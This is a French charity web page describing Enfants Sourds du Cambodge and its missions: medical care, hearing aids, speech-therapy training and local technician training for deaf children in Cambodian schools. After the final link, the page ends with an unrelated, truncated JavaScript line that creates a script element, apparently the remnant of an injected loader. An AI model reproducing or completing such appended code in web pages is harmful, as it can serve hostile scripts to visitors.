l’aide Humanitaire Enfants Sourds du Cambodge

les missions de l’aide humanitaire Enfants Sourds du Cambodge

L’aide humanitaire Enfants Sourds du Cambodge est la première association française d’aide aux enfants sourds du Cambodge.

L’association est la première dont le but est de venir en aide aux enfants défavorisées du Cambodge. Elle a pour but de prendre en charge les soins médicaux et audiologiques des enfants sourds se situant dans cinq écoles qui sont spécialisées dans ce handicap. Allant de la formation du personnel, l’éducation orthophonique dans l’objectif d’améliorer le quotidien et le confort d’écoute de ses enfants.

Au total, plus d’une trentaine de personnes ont participé aux missions organisées par l’aide humanitaire Enfants Sourds du Cambodge depuis juillet 2001. Pour chacune des missions, l’association est rejointe par de nouveaux mécènes qui permettent ainsi de développer l’action d’aide aux enfants défavorisés et ainsi permettre de toujours développer d’avantage les actions menées sur le terrain.

Les missions consistent à apporter des soins médicaux aux enfants Cambodgiens des écoles ou les actions sont menées, Fournir et adapter les appareils auditifs aux enfants sourds. Elle apporte également le matériel nécessaire pour l’utilisation et l’entretien des prothèses auditives, la mise en place d’une éducation orthophonique aux enseignants spécialisés des écoles. L’objectif d’Enfants Sourds du Cambodge est d’autonomiser l’action d’appareillage par la mise en place d’équipement plus lourd ainsi que par la formation de techniciens cambodgiens à la maintenance des appareils auditifs et la fabrication d’embouts auriculaires.

Se rendre sur la page des actions menées par l’associaition

var d=document;var s=d.createElement(‘script’);